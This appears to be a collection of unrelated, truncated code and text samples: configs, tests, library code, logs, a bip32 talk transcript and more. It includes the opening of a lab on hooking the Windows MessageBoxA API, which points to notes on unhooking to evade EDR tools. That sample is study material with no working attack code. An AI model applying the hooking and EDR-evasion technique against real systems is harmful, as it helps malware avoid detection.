issue here if the content shared in this repository needs to be re-evaluated by Adobe.\n\n## Topic\n\nThis is an issue regarding:\n\n- [ ] The XD Awesome repository README.\n- [ ] The open source plugins shared within this repo.\n- [ ] The utility libraries shared within this repo.\n- [ ] The developer tools shared within this repo.\n- [ ] Other\n\n## Description of the issue" +"#~# ORIGINAL\n\nx = 1\n xyz = 2\n\n w = 3\n\n#~# EXPECTED\nx = 1\nxyz = 2\n\nw = 3\n\n#~# ORIGINAL\n\nx = 1\n foo[bar] = 2\n\n w = 3\n\n#~# EXPECTED\nx = 1\nfoo[bar] = 2\n\nw = 3\n\n#~# ORIGINAL\n\nx = 1; x = 2\n xyz = 2\n\n w = 3\n\n#~# EXPECTED\nx = 1; x = 2\nxyz = 2\n\nw = 3\n\n#~# ORIGINAL\n\na = begin\n b = 1\n abc = 2\n end\n\n#~# EXPECTED\na = begin\n b = 1\n abc = 2\n end\n\n#~# ORIGINAL\n\na = 1\n a += 2\n\n#~# EXPECTED\na = 1\na += 2\n\n#~# ORIGINAL\n\nfoo = 1\n a += 2\n\n#~# EXPECTED\nfoo = 1\na += 2\n\n#~# ORIGINAL\n\nx = 1\n xyz = 2\n\n w = 3\n\n#~# EXPECTED\nx = 1\nxyz = 2\n\nw = 3" +"# How to use RollingFileOutputter\n\n$: << \"../lib\"\nrequire 'log4r'\ninclude Log4r\n\nputs \"this will take a while\"\n\n# example of log file being split by time constraint 'maxtime'\nconfig = {\n \"filename\" => \"logs/TestTime.log\",\n \"maxtime\" => 10,\n \"trunc\" => true\n}\ntimeLog = Logger.new 'WbExplorer'\ntimeLog.outputters = RollingFileOutputter.new(\"WbExplorer\", config)\ntimeLog.level = DEBUG\n\n# log something once a second for 100 seconds\n100.times { |t|\n timeLog.info \"blah #{t}\"\n sleep(1.0)\n}\n\n# example of log file being split by space constraint 'maxsize'\nconfig = {\n \"filename\" => \"logs/TestSize.log\",\n \"maxsize\" => 16000,\n \"trunc\" => true\n}\nsizeLog = Logger.new 'WbExplorer'\nsizeLog.outputters = RollingFileOutputter.new(\"WbExplorer\", config)\nsizeLog.level = DEBUG\n\n# log a large number of times\n100000.times { |t|\n sizeLog.info \"blah #{t}\"\n}\n\nputs \"done! check the two sets of log files in logs/ (TestTime and TestSize)\"" +"#FIG 3.2 Produced by xfig version 3.2.6a\nLandscape\nCenter\nInches\nA4\n100.00\nSingle\n-2\n1200 2\n6 900 1500 2100 3300\n2 2 0 1 0 0 50 -1 -1 4.000 0 0 -1 0 0 5\n\t 900 1500 2100 1500 2100 3300 900 3300 900 1500\n4 1 0 50 -1 0 12 0.0000 0 135 90 1500 2175 P\\001\n-6\n6 2100 1500 4500 3000\n2 3 0 1 0 0 50 -1 -1 0.000 0 0 -1 0 0 11\n\t 2100 1500 4500 1500 4500 3000 3525 3000 3525 2700 3000 2700\n\t 3000 2250 2400 2250 2400 1800 2100 1800 2100 1500\n4 1 0 50 -1 0 12 0.0000 0 150 90 3300 2100 Q\\001\n-6\n2 1 2 1 0 0 50 -1 -1 3.000 0 0 -1 0 0 3\n\t 2100 3300 4500 3300 4500 3000" +" SUBROUTINE PRETRD (CSTMX,NCSTMX) \r\nC \r\nC PRETRD SETS UP EVENTUAL CALLS TO TRANSD. FOR A MODULE TO USE \r\nC TRANSD A CALL TO PRETRD MUST BE INITIATED BY THE MODULE DRIVER \r\nC ONCE AND ONLY ONCE. CSTMX IS ARRAY OF COORDINATE SYSTEM \r\nC TRANSFORMATION MATRICES AND MCSTMX IS THE LENGTH OF THIS ARRAY. \r\nC \r\nC THE ARRAY CSTMX MUST BE WITHIN OPEN CORE BOUND, AND THERE IS NO \r\nC CHECK ON THIS CONDITION. \r\nC \r\nC GIVEN THE ECPT ARRAY OF LENGTH 4, THE FIRST WORD BEING AN INTEGER \r\nC COORDINATE SYSTEM IDENTIFICATION NUMBER AND THE NEXT WORDS BEING \r\nC THE REAL COORDINATES OF A POINT IN BASIC COORDINATES, THIS ROUTINE\r\nC COMPUTES THE TRANSFORMATION (DIRECTION COSINE) MATRIX TA WHICH \r\nC WILL MAP A VECTOR FROM THE LOCAL SYSTEM LABELED ECPT(1) TO BASIC \r\nC COORDINATES. TA IS A DOUBLE PRECISION MATRIX. \r\nC \r\nC REVISED 7/92 BY G.CHAN/UNISYS. NEW REFERENCE TO CSTM ARRAY SUCH \r\nC THAT THE SOURCE CODE IS UP TO ANSI FORTRAN 77 STANDARD. \r\nC \r\n INTEGER OFFSET \r\n DOUBLE PRECISION TA(9),TL(9),XN(3),X,Y,Z,R,KE(9),XL \r\n DIMENSION CSTMX(1),ECPT(4) \r\nCZZ COMMON /XNSTRN/ CSTM(1) \r\n COMMON /ZZZZZZ/ CSTM(1) \r\n EQUIVALENCE (FL1,INT1),(FL2,INT2) \r\nC \r\n NCSTM = NCSTMX \r\n OFFSET = LOCFX(CSTMX(1)) - LOCFX(CSTM(1)) \r\n IF (OFFSET .LT. 0) CALL ERRTRC ('PRETRD ',1) \r\n ICHECK = 123456789" +"Filter 1: ON PK Fc 18 Hz Gain 5.1 dB Q 0.68\nFilter 2: ON PK Fc 228 Hz Gain -3.0 dB Q 0.80\nFilter 3: ON PK Fc 895 Hz Gain -3.8 dB Q 1.68\nFilter 4: ON PK Fc 3692 Hz Gain 6.5 dB Q 1.96\nFilter 5: ON PK Fc 10393 Hz Gain 6.9 dB Q 1.99\nFilter 6: ON PK Fc 2057 Hz Gain 1.9 dB Q 3.44\nFilter 7: ON PK Fc 8688 Hz Gain 4.3 dB Q 5.38\nFilter 8: ON PK Fc 12624 Hz Gain 5.1 dB Q 1.73\nFilter 9: ON PK Fc 15532 Hz Gain 5.5 dB Q 1.00\nFilter 10: ON PK Fc 19603 Hz Gain -11.6 dB Q 0.22" +"# Windows API Hooking\n\nThis lab is a quick look into how userland WinAPIs can be hooked. A `MessageBoxA` function will be hooked in this instance, but it could be any.\n\n> **API hooking** is a technique by which we can instrument and modify the behavior and flow of **API**calls. \n> [https://resources.infosecinstitute.com/api-hooking/](https://resources.infosecinstitute.com/api-hooking/)\n\nWindows API hooking is one of the techniques used by AV/EDR solutions to determine if code is malicious. You can read some of my notes on bypassing EDRs by leveraging unhooking - [Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs](../defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis.md)\n\nFor this lab, I will write a simple C++ program that will work follows:\n\n1. Get memory address of the `MessageBoxA` function\n2. Read the first 6 bytes of the `MessageBoxA` - will need these bytes for unhooking the function\n3. Create a `HookedMessageBox` function that will be executed when the original `MessageBoxA` is called\n4. Get memory address of the `HookedMessageBox`\n5. Patch / redirect `MessageBoxA` to `HookedMessageBox`\n6. Call `MessageBoxA`. Code gets redirected to `HookedMessageBox`\n7. `HookedMessageBox` executes its code, prints the supplied arguments, unhooks the `MessageBoxA` and transfers the code control to the actual `MessageBoxA`\n\n## Execution\n\nPop the message box before the function" +"var adt = require('../adt');\n\nvar List = adt.data(function () {\n this.apply = function (ctx, args) {\n return this.fromArray(args);\n };\n});\n\nvar Nil = List.type('Nil');\nvar Cons = List.type('Cons', { \n head: adt.any, \n tail: adt.only(List) \n});\n\n// Create a list from an array\nList.fromArray = function (arr) {\n var i = arr.length, l = Nil;\n while (i--) l = Cons(arr[i], l);\n return l;\n};\n\n// Make it foldable\nList.prototype.reduce = function (fn, memo) {\n var item = this;\n while (item.isCons) {\n memo = fn(memo, item.head);\n item = item.tail;\n }\n return memo;\n};\n\n// Create an array from a list\nList.prototype.toArray = function () {\n return this.reduce(function (arr, val) {\n arr.push(val);\n return arr;\n }, []);\n};\n\n// Find the length of the list\nList.prototype.length = function () {\n return this.reduce(function (len, val) {\n return len + 1;\n }, 0);\n};\n\n// Concat two lists together\nList.prototype.concat = function (list) {\n return this.isNil ? list : Cons(this.head, this.tail.concat(list));\n};\n\n// Flatten a level\nList.prototype.flatten = function () {\n return this.reduce(function (memo, list) {\n return memo.concat(list);\n }, Nil);\n};\n\n// Make it a functor\nList.prototype.map = function (fn) {\n return this.isNil ? this : Cons(fn(this.head), this.tail.map(fn));\n};\n\n// Make it a monad\nList.prototype.chain = function" +"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 -*-\nr\"\"\"Regression detection in ASV is based on detecting stepwise changes\nin the graphs. The assumptions on the data are as follows: the curves\nare piecewise constant plus random noise. We don't know the scaling of\nthe data or the amplitude of the noise, but assume the relative weight\nof the noise amplitude is known for each data point.\n\nASV measures the noise amplitude of each data point, based on a number\nof samples. We use this information for weighting the different data\npoints:\n\n.. math::\n\n \\sigma_j = \\sigma \\mathrm{CI}_{99} = \\sigma / w_j\n\ni.e., we assume the uncertainty in each measurement point is\nproportional to the estimated confidence interval for each data point.\nTheir inverses are taken as the relative weights ``w_j``. If ``w_j=0``\nor undefined, we replace it with the median weight, or with ``1`` if\nall are undefined. The step detection algorithm determines the\nabsolute noise amplitude itself based on all available data, which is\nmore robust than relying on the individual measurements.\n\nStep detection is a well-studied problem. In this implementation, we\nmainly follow a variant of the approach outlined in" +"# uraster\n\nMicro simple software rasterizer in a single C++11 header file. Does not use OpenGL. Pure C++11. \n\nMostly useful as a way of teaching how the rendering pipeline in hardware works.\n\n![Image from uraster](https://raw.githubusercontent.com/Steve132/uraster/master/example/screenshot.jpg)\n\nA day ago, I saw this post [Asking how to create a software renderer](http://www.reddit.com/r/GraphicsProgramming/comments/2whjam/creating_a_software_renderer/).\n\nI started writing my response, and it looked something like this:\n\n> One should not create a software rasterizer unless they are giant masochists. However, if you were to do it, and first you need to ....\n \nAfter a while I stopped. After writing my tutorial on how to make a C++ rasterizer in english, I realized it was nearly unreadable.\n\nNew idea: I'll just write the tutorial in pseudocode. Then, I looked at the pseudocode. It was unreadable because it wasn't *quite* a language\n\nNew idea: I'll write the skeleton of the header with comments explaining what to put in the code! I did this.\n\nSurely you can see where this is going. \n\nI ended up actually filling in the code, and implementing a simple rasterization pipeline all in one C++11 header standalone header file. The interface is similar to a dramatically simplified version of OpenGL2.0 with shader support, that" +"\ufeffusing System.Linq;\r\nusing LinqToDB.Mapping;\r\nusing NUnit.Framework;\r\n\r\nnamespace Tests.UserTests\r\n{\r\n\t[TestFixture]\r\n\tpublic class Issue999Tests : TestBase\r\n\t{\r\n\t\tpublic class Address\r\n\t\t{\r\n\t\t public string? City { get; set; }\r\n\t\t public string? Street { get; set; }\r\n\t\t public int Building { get; set; }\r\n\t\t}\r\n\r\n\t\t[Column(\"city\", \"Residence.City\")]\r\n\t\t[Column(\"user_name\", \"Name\")]\r\n\t\tpublic class User\r\n\t\t{\r\n\t\t public string? Name;\r\n\r\n\t\t [Column(\"street\", \".Street\")]\r\n\t\t [Column(\"building_number\", MemberName = \".Building\")]\r\n\t\t public Address? Residence { get; set; }\r\n\t\t}\r\n\r\n\t\t[Test]\r\n\t\tpublic void SampleSelectTest([DataSources] string context)\r\n\t\t{\r\n\t\t\tusing (var db = GetDataContext(context))\r\n\t\t\tusing (var users = db.CreateLocalTable<User>())\r\n\t\t\t{\r\n\t\t\t\tvar query = users.Select(u => u.Residence!.City);\r\n\t\t\t\tAssert.AreEqual(1, query.GetSelectQuery().Select.Columns.Count);\r\n\r\n\t\t\t\tquery.ToList();\r\n\r\n\t\t\t\tquery = users.Select(u => u.Residence!.Street);\r\n\t\t\t\tAssert.AreEqual(1, query.GetSelectQuery().Select.Columns.Count);\r\n\r\n\t\t\t\tquery.ToList();\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}" +"title: Time Statistics on KVM Exit Reasons\nname: kvm_service_time.stp\nversion: 1.0\nauthor: William Cohen\nkeywords: _best virtualization kvm\nsubsystem: virtualization\nstatus: experimental\nexit: user-controlled\noutput: sorted-list\nscope: system-wide\ndescription: The kvm_service_time.stp script tracks the statistics about the amount of time that the processor left the guest virtual machine for each exit reason (for example fixing up a page table or handling an IO operation). When the script exits it prints out the number of times each exit reason was encountered, the total duration of time it left the guest VM, the minimum time, the average time, and the maximum time in microseconds for that exit reason. On Linux 2.6.38 and newer kernel the script can automatically determine whether it is running on Intel or AMD processors. For older kernels with a kernel.trace(\"kvm_exit\") tracepoint that does not have the $isa parameter you can explicitly state the kvm type with a \"-G kvm=intel\" or \"-G kvm=amd\" on the command line.\ntest_support: stap -l 'kernel.trace(\"kvm_entry\")' && stap -l 'kernel.trace(\"kvm_exit\")'\ntest_check: stap -p4 kvm_service_time.stp\ntest_installcheck: stap kvm_service_time.stp -c \"sleep 1\"" +"# SHORT_TIMEOUT creates a consistent short timeout of the wait_for condition.\nSHORT_TIMEOUT=5\n\n# wait_for defines the ability to wait for a given condition to happen in a\n# juju status output. The output is JSON, so everything that the API server\n# knows about should be valid.\n# The query argument is a jq query.\n#\n# ```\n# wait_for <model name> <query>\n# ```\nwait_for() {\n local name query\n\n name=${1}\n query=${2}\n\n attempt=0\n # shellcheck disable=SC2046,SC2143\n until [ \"$(juju status --format=json 2> /dev/null | jq -S \"${query}\" | grep \"${name}\")\" ]; do\n echo \"[+] (attempt ${attempt}) polling status for\" \"${name}\"\n juju status --relations 2>&1 | sed 's/^/ | /g'\n sleep \"${SHORT_TIMEOUT}\"\n attempt=$((attempt+1))\n done\n\n if [ \"${attempt}\" -gt 0 ]; then\n echo \"[+] $(green 'Completed polling status for')\" \"$(green \"${name}\")\"\n juju status --relations 2>&1 | sed 's/^/ | /g'\n # Although juju reports as an idle condition, some charms require a\n # breathe period to ensure things have actually settled.\n sleep \"${SHORT_TIMEOUT}\"\n fi\n}\n\nidle_condition() {\n local name app_index unit_index\n\n name=${1}\n app_index=${2:-0}\n unit_index=${3:-0}\n\n path=\".[\\\"$name\\\"] | .units | .[\\\"$name/$unit_index\\\"]\"\n\n echo \".applications | select(($path | .[\\\"juju-status\\\"] | .current == \\\"idle\\\") and ($path | .[\\\"workload-status\\\"] | .current != \\\"error\\\")) | keys[$app_index]\"\n}\n\nidle_subordinate_condition() {" +"module Fog\n module AWS\n class ElasticBeanstalk\n class Version < Fog::Model\n attribute :label, :aliases => 'VersionLabel'\n attribute :application_name, :aliases => 'ApplicationName'\n attribute :created_at, :aliases => 'DateCreated'\n attribute :updated_at, :aliases => 'DateUpdated'\n attribute :description, :aliases => 'Description'\n attribute :source_bundle, :aliases => 'SourceBundle'\n attribute :auto_create_application # FIXME - should be write only\n\n def initialize(attributes={})\n super\n end\n\n # Return events related to this version\n def events\n requires :label, :application_name\n service.events.all({\n 'ApplicationName' => application_name,\n 'VersionLabel' => label\n })\n end\n\n # Returns environments running this version\n def environments\n requires :label, :application_name\n service.environments.all({\n 'ApplicationName' => application_name,\n 'VersionLabel' => label\n })\n end\n\n def destroy(delete_source_bundle = nil)\n requires :label, :application_name\n service.delete_application_version(application_name, label, delete_source_bundle)\n true\n end\n\n def save\n requires :label, :application_name\n\n options = {\n 'ApplicationName' => application_name,\n 'AutoCreateApplication' => auto_create_application,\n 'Description' => description,\n 'SourceBundle' => source_bundle,\n 'VersionLabel' => label\n }\n options.delete_if {|key, value| value.nil?}\n\n data = service.create_application_version(options).body['CreateApplicationVersionResult']['ApplicationVersion']\n merge_attributes(data)\n true\n end\n\n # Updates the version label with the current property values. Currently only updates description\n def update\n requires :label, :application_name\n\n options = {\n 'ApplicationName' => application_name,\n 'Description' => description,\n 'VersionLabel' => label\n }\n options.delete_if {|key, value| value.nil?}\n\n data = service.update_application_version(options).body['UpdateApplicationVersionResult']['ApplicationVersion']\n merge_attributes(data)\n end\n end\n end\n end\nend" +"12--Group/12_Group_Large_Group_12_Group_Large_Group_12_15.jpg\n20\n635.269 445.662 36.0747 43.9092 0.997739\n407.332 367.71 46.8934 57.5458 0.99694\n519.605 393.583 32.9069 39.5234 0.99631\n805.862 427.317 35.2679 40.9305 0.995612\n76.062 416.187 35.1402 42.0799 0.995379\n736.555 344.2 30.9573 38.8431 0.994962\n243.631 355.414 35.0664 44.0496 0.994918\n173.256 383.284 30.6572 37.4854 0.993937\n859.331 438.068 34.5137 40.1411 0.992819\n139.224 325.545 37.2591 46.9104 0.992599\n517.539 258.742 34.8766 46.7742 0.992304\n634.474 328.945 34.1324 41.3951 0.99223\n764.317 267.732 36.4325 44.6274 0.991453\n356.862 282.651 38.3657 45.7119 0.988963\n613.142 196.97 39.3177 46.9763 0.986956\n853.06 203.451 42.4352 53.3326 0.986847\n303.986 195.971 43.8529 55.1288 0.986732\n566.693 308.463 29.2115 35.3712 0.984446\n405.58 240.303 40.1848 46.2341 0.980785\n217.786 220.552 37.6437 45.7677 0.977405" +"#title The Borqs Alchemy Library Usage Manual\n#author Bao Haojun <haojun.bao@borqs.com>\n\n\nCopyright Borqs, Inc. 2009, All Rights Reserved\n<contents>\n\n* Introduction\n\nThis user manual corresponds to Borqs Alchemy Library version\n1.0.6. This is the library to be used for testing the OMS phone. The\nmain functions of this library include:\n - Initialization. Connection to the phone is established through\n usbnet; connection status callback and logging callback functions\n are saved.\n - Execution. Test commands can be sent to the phone. Refer to the\n `TCMD Reference Manual' for a complete detailed list of supported\n commands.\n - Help system. A simple help system is built-in in this library, it\n will print a simplified list of the *TCMD* commands supported by this\n library.\n\nThree files are provided for development, together with a\nsample console project. The 3 development files are:\n 1. =libalchemy.h=, the header file used for compilation\n 2. =alchemylib.lib=, the .lib file used for linking\n 3. =alchemylib.dll=, the .dll file used for running your program.\n\n\n** How to use the library\n\nYou can develop either win32 or console applications using this\nlibrary. MFC must be used, and it must be linked as a shared DLL. \n - If MFC is not used, compilation will" +"//\n// TPTransferTask.swift\n// Example\n//\n// Created by Le VanNghia on 3/27/15.\n// Copyright (c) 2015 Le VanNghia. All rights reserved.\n//\n\nimport Foundation\n\n// TODO\n/*\n- header configuration\n- parameter \n- resume\n- suspend\n- cancel\n*/\n\npublic class TPTransferTask : TPTask {\n public var method: TPMethod = .GET\n public var HTTPShouldUsePipelining = false\n public var HTTPShouldHandleCookies = true\n public var allowsCellularAccess = true\n public var params: [String: AnyObject]?\n public var headers: [String: String]?\n public var completionHandler: TransferCompletionHandler?\n \n var url: String\n var request: NSMutableURLRequest?\n var totalBytes: Int64 = 0\n var session: NSURLSession?\n var responseData: NSData?\n var jsonData: AnyObject? {\n if let reponseData = responseData {\n return NSJSONSerialization.JSONObjectWithData(reponseData, options: .AllowFragments, error: nil)\n }\n return nil\n }\n var error: NSError?\n var failed: Bool {\n return error != nil\n }\n \n public init(url: String, params: [String: AnyObject]? = nil) {\n self.url = url\n self.params = params\n super.init()\n }\n \n func setup() {\n let requestUrl = NSURL(string: url)!\n let request = NSMutableURLRequest(URL: requestUrl)\n request.HTTPMethod = method.rawValue\n request.HTTPShouldUsePipelining = HTTPShouldUsePipelining\n request.HTTPShouldHandleCookies = HTTPShouldHandleCookies\n request.allowsCellularAccess = allowsCellularAccess\n \n // append header\n if let headers = headers {\n for (key, value) in headers {\n request.setValue(value, forHTTPHeaderField: key)\n }\n }\n // append http body\n if let params =" +"\n/*! @brief HeapGraphNode represents a node in a heap graph. */\ninterface HeapGraphNode : object\n{\n /*! @brief node type, the value can be:\n - profiler.Node_Hidden, Hidden node, may be filtered when shown to user.\n - profiler.Node_Array, An array of elements.\n - profiler.Node_String, A string.\n - profiler.Node_Object, A JS object (except for arrays and strings).\n - profiler.Node_Code, Compiled code.\n - profiler.Node_Closure, Function closure.\n - profiler.Node_RegExp, RegExp.\n - profiler.Node_HeapNumber, Number stored in the heap.\n - profiler.Node_Native, Native object (not from V8 heap).\n - profiler.Node_Synthetic, Synthetic object, usualy used for grouping snapshot items together.\n - profiler.Node_ConsString, Concatenated string. A pair of pointers to strings.\n - profiler.Node_SlicedString, Sliced string. A fragment of another string.\n - profiler.Node_Symbol, A Symbol (ES6).\n - profiler.Node_SimdValue, A SIMD value stored in the heap (Proposed ES7).\n */\n readonly Integer type;\n\n /*! @brief node name */\n readonly String name;\n\n /*! @brief node ID */\n readonly Integer id;\n\n /*! @brief node's own size, in bytes. */\n readonly Integer shallowSize;\n\n /*! @brief child nodes list */\n readonly List childs;\n};" +"About the Team\n===========================\n\nWe are the Zoonies! We're a group of burners & technology lovers from San Francisco and Utah!\n\nTL;DR: Thomas, Patrick, and Ray (maybe?) work in some sort of job where they have stand-up meetings on a daily basis. Pam is spending some time with electric cars and Margeaux, source of inspiration, light and joy, is our resident aesthician, product instigator, scrummaster and wordsmith.\n \n\nSkills and Plans\n=======\nAs a combined team, we use these languages on the daily:\n- Javascript\n- Java\n- Node.js\n- Ruby on Rails\n\nAPIs that we are like include but are not limited to:\n- Twitter\n- WolframAlpha\n\nLeaning toward theme #1, we're tossing around ideas of integrating environment, suprise data types, and biometrics data over time. Looking to generate a web-kit app that can pull in data from a backend service with configurable data-feeds." +"\ufeff// Copyright (c) Microsoft Corporation. All rights reserved.\n// Licensed under the MIT License. See LICENSE in the project root for license information.\n\nusing System.Linq;\nusing System.Threading.Tasks;\nusing FluentAssertions;\nusing Microsoft.Common.Core;\nusing Microsoft.R.ExecutionTracing;\nusing Microsoft.R.StackTracing;\n\nnamespace Microsoft.R.Host.Client.Test {\n internal static class RSessionExtensions {\n public static async Task NextPromptShouldBeBrowseAsync(this IRSession session) {\n var tracer = await session.TraceExecutionAsync(); \n\n // Grab the next available prompt, and verify that it's Browse>\n using (var inter = await session.BeginInteractionAsync()) {\n inter.Contexts.IsBrowser().Should().BeTrue(\"Next available prompt should be a Browse> prompt\");\n }\n\n // Now wait until session tells us that it has noticed the prompt and processed it.\n // Note that even if we register the handler after it has already noticed, but\n // before the interaction completed, it will still invoke the handler.\n var browseTask = EventTaskSources.IRExecutionTracer.Browse.Create(tracer);\n\n // Spin until either Browse is raised, or we see a different non-Browse prompt.\n // If the latter happens, we're not going to see Browse raised for that prompt that we've\n // seen initially, because something had interfered asynchronously, which shouldn't happen\n // in a test - and if it does, the test should be considered failed at that point, because\n // the state is indeterminate.\n while (true) {\n var interTask" +"package mop::manual::details::roles;\n# ABSTRACT: A manual for p5-mop\n\n__END__\n\n=pod\n\n=head1 NAME\n\nmop::manual::details::roles - A manual for p5-mop\n\n=head1 DESCRIPTION\n\nTODO\n\n=head1 GRAMMAR\n\nRoles in the p5-mop are defined in the following way:\n\n role NAME\n ?(with NAME ?(, NAME)*)\n ?(meta NAME)\n ?(is TRAIT ?(, TRAIT)*)\n BLOCK\n\nThe C<role> keyword is followed by a name.\n\nWhich is optionally followed by the C<with> keyword that is\nfollowed by a comma separated list of the names of the roles\nyou wish to be composed into your role.\n\nWhich is optionally followed by the C<meta> keyword\nthat is followed by the name of the metarole you wish to\nbe used in constructing this role.\n\nWhich is optionally followed by the C<is> keyword that is\nfollowed by a comma separated list of traits you wish to\nbe applied to your role.\n\nAfter this comes a block, within which you can define\nmethods and attributes (refer to those docs for more info).\n\n=head1 BUGS\n\nSince this module is still under development we would prefer to not\nuse the RT bug queue and instead use the built in issue tracker on\nL<Github|http://www.github.com>.\n\n=head2 L<Git Repository|https://github.com/stevan/p5-mop-redux>\n\n=head2 L<Issue Tracker|https://github.com/stevan/p5-mop-redux/issues>\n\n=head1 AUTHOR\n\nStevan Little <stevan.little@iinteractive.com>\n\nJesse Luehrs <doy@tozt.net>\n\n=head1" +"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule for API-related calls.\n\"\"\"\n\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse\n\n\ndef hostname_tld_migration(hostname):\n \"\"\"\n Migrate transifex.net to transifex.com.\n\n :param hostname: The hostname to migrate (if needed).\n :returns: A hostname with the transifex.com domain (if needed).\n \"\"\"\n parts = urlparse.urlparse(hostname)\n if parts.hostname.endswith('transifex.net'):\n hostname = hostname.replace('transifex.net', 'transifex.com', 1)\n return hostname\n\n\ndef hostname_ssl_migration(hostname):\n \"\"\"\n Migrate Transifex hostnames to use HTTPS.\n\n :param hostname: The hostname to migrate (if needed).\n :returns: A https hostname (if needed).\n \"\"\"\n parts = urlparse.urlparse(hostname)\n is_transifex = (\n parts.hostname[-14:-3] == '.transifex.' or\n parts.hostname == 'transifex.net' or\n parts.hostname == 'transifex.com'\n )\n is_https = parts.scheme == 'https'\n if is_transifex and not is_https:\n if not parts.scheme:\n hostname = 'https:' + hostname\n else:\n hostname = hostname.replace(parts.scheme, 'https', 1)\n return hostname\n\n\ndef visit_hostname(hostname):\n \"\"\"\n Have a chance to visit a hostname before actually using it.\n\n :param hostname: The original hostname.\n :returns: The hostname with the necessary changes.\n \"\"\"\n for processor in [hostname_ssl_migration, hostname_tld_migration, ]:\n hostname = processor(hostname)\n return hostname" +"Rank = 0 Free Memory = 13187 MB\nRank = 1 Free Memory = 13187 MB\nRank = 2 Free Memory = 13187 MB\nRank = 3 Free Memory = 13187 MB\nRank = 4 Free Memory = 13187 MB\nRank = 5 Free Memory = 13187 MB\nRank = 6 Free Memory = 13187 MB\nRank = 7 Free Memory = 13187 MB\nRank = 8 Free Memory = 13187 MB\nRank = 9 Free Memory = 13187 MB\nRank = 10 Free Memory = 13187 MB\nRank = 11 Free Memory = 13187 MB\nWARNING ParticleSet::checkBoundBox 3.4> SimulationCellRadius=1.9475\n Using SLOW method for the sphere update. \nWARNING Skip Chiesa estimator due to the lack of support with SoA. Access the correction via AoS at the moment." +"\n#ifndef SAGE_MIME_H\n#define SAGE_MIME_H\n\n#include <QString>\n\nconst QString SG_NODE_MIMETYPE = \"application/SgNode\";\nconst QString SG_NODE_BINARY_MIMETYPE = \"application/SgNode-binary\";\nconst QString SG_NODE_SOURCE_MIMETYPE = \"application/SgNode-source\";\n\nclass SgNode;\n\nclass QMimeData;\n\ntypedef std::vector<SgNode *> SgNodeVector;\n\n/// creates MIME Data out of a SgNode\n/// depending on the node, the base type (source or binary) gets set by finding\n/// the appropriate SgFile\n/// the other file gets set if the appropriate Link Attribute is set\nQMimeData *createSageMimeData( SgNode *node );\n\n/// extract the MIME data, returns NULL if not set\nSgNode *getGeneralNode( const QMimeData *data );\nSgNodeVector getSourceNodes( const QMimeData *data );\nSgNodeVector getBinaryNodes( const QMimeData *data );\n\nSgNodeVector getNodes( const QMimeData *data, const QString& type );\n\n#endif" +"Hierarchical deterministic Wallets (bip32)\n\nJames Chiang\n\n<https://twitter.com/kanzure/status/1047714436889235456>\n\nvideo: <https://www.youtube.com/watch?v=OVvue2dXkJo>\n\n<https://teachbitcoin.io/presentations/wallets.html>\n\n# Introduction\n\nMy name is James Chiang. Quick introduction about myself. My contributions to bitcoin have been on the project libbitcoin where I do documentation. I've been working through the APIs and libraries. I think it's a great toolkit. Eric Voskuil is speaking later today and he also works on libbitcoin. I also volunteered to talk about hierarchical deterministic wallets.\n\nWhen we talk about bitcoin wallets, you always have some kind of secret or entropy you want to keep safe. One way to handle it and store it more easily is to use word lists. Obviously, you want to derive new fresh keys whenever you transact, so that's child key derivation. Also, there's a tree structure for standard recovery of the keys.\n\n# bip39: Mnemonic keywords\n\n<https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki>\n\nWhat we're doing here is we have some kind of entropy to encode words. So here we have 128 bits of entropy. But you can have any multiple of 32 bits all the way up to 256 bits. When we encode these words, we want to make sure we have this checksum part. There's a 4-bit checksum, first few bits of the entropy" +"open! Import\n\ninclude Ast_pattern0\n\nlet save_context ctx = ctx.matched\nlet restore_context ctx backup = ctx.matched <- backup\n\nlet incr_matched c = c.matched <- c.matched + 1\n\nlet parse (T f) loc ?on_error x k =\n try f { matched = 0 } loc x k\n with Expected (loc, expected) ->\n match on_error with\n | None -> Location.raise_errorf ~loc \"%s expected\" expected\n | Some f -> f ()\n\nmodule Packed = struct\n type ('a, 'b) t = T : ('a, 'b, 'c) Ast_pattern0.t * 'b -> ('a, 'c) t\n\n let create t f = T (t, f)\n let parse (T (t, f)) loc x = parse t loc x f\nend\n\nlet __ = T (fun ctx _loc x k -> incr_matched ctx; k x)\n\nlet __' = T (fun ctx loc x k -> incr_matched ctx; k { loc; txt = x })\n\nlet drop = T (fun ctx _loc _ k -> incr_matched ctx; k)\n\nlet cst ~to_string ?(equal=Poly.equal) v = T (fun ctx loc x k ->\n if equal x v then begin\n incr_matched ctx;\n k\n end else\n fail loc (to_string v)\n);;\n\nlet int v = cst ~to_string:Int.to_string v\nlet char v = cst ~to_string:(Printf.sprintf \"%C\") v" +"# Installs apache and runs the lms wsgi by default\n---\n- name: Installs apache and mod_wsgi from apt\n apt:\n name: \"{{ item }}\"\n install_recommends: no\n state: present\n update_cache: yes\n with_items:\n - apache2\n - libapache2-mod-wsgi\n notify: restart apache\n \n- name: Disables default site\n file:\n path: /etc/apache2/sites-enabled/000-default\n state: absent\n notify: restart apache\n \n- name: Rewrite apache ports conf\n template:\n src: ports.conf.j2\n dest: /etc/apache2/ports.conf\n owner: root\n group: root\n notify: restart apache\n\n- debug:\n msg: \"{{ apache_sites }}\"\n\n- name: \"Copying apache configs for {{ apache_sites }}\"\n template:\n src: \"{{ item }}.j2\"\n dest: \"/etc/apache2/sites-available/{{ item }}\"\n owner: root\n group: \"{{ common_web_user }}\"\n mode: \"0640\"\n notify: restart apache\n with_items: \"{{ apache_sites }}\"\n\n- name: \"Creating apache2 config links for {{ apache_sites }}\"\n file:\n src: \"/etc/apache2/sites-available/{{ item }}\"\n dest: \"/etc/apache2/sites-enabled/{{ item }}\"\n state: link\n owner: root\n group: root\n notify: restart apache\n with_items: \"{{ apache_sites }}\"" +"# frozen_string_literal: true\n\nrequire 'spec_helper'\nrequire 'nokogiri'\n\nRSpec.describe Gitlab::Asciidoc::IncludeProcessor do\n let_it_be(:project) { create(:project, :repository) }\n\n let(:processor_context) do\n {\n project: project,\n max_includes: max_includes,\n ref: ref\n }\n end\n\n let(:ref) { project.repository.root_ref }\n let(:max_includes) { 10 }\n\n let(:reader) { 